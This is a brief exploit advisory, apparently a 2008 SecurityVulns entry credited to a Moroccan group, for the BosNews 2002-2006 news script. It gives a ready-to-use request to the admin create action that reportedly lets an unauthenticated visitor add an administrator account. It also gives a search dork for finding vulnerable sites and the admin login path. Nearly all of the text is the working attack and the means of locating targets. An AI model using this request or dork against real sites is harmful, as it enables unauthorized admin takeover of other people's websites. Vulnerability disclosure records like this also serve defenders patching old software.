BosNews 2002-2006 Remote add user admin

2008-04-15T00:00:00
ID SECURITYVULNS:DOC:19665
Type securityvulns
Reporter Securityvulns
Modified 2008-04-15T00:00:00

Description


----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo


= Author : HouSSaMix
= Script : BosNews = version : 2002-2006 = Download : http://www.bosdev.com/

= Dork : Powered by BosNews Copyright 2002-2006

= BUG : Remote add user admin

exploit => Target.com/path/admin/index.php?action=create

here u can add a new user admin

= admin login

Target.com/path/admin/index.php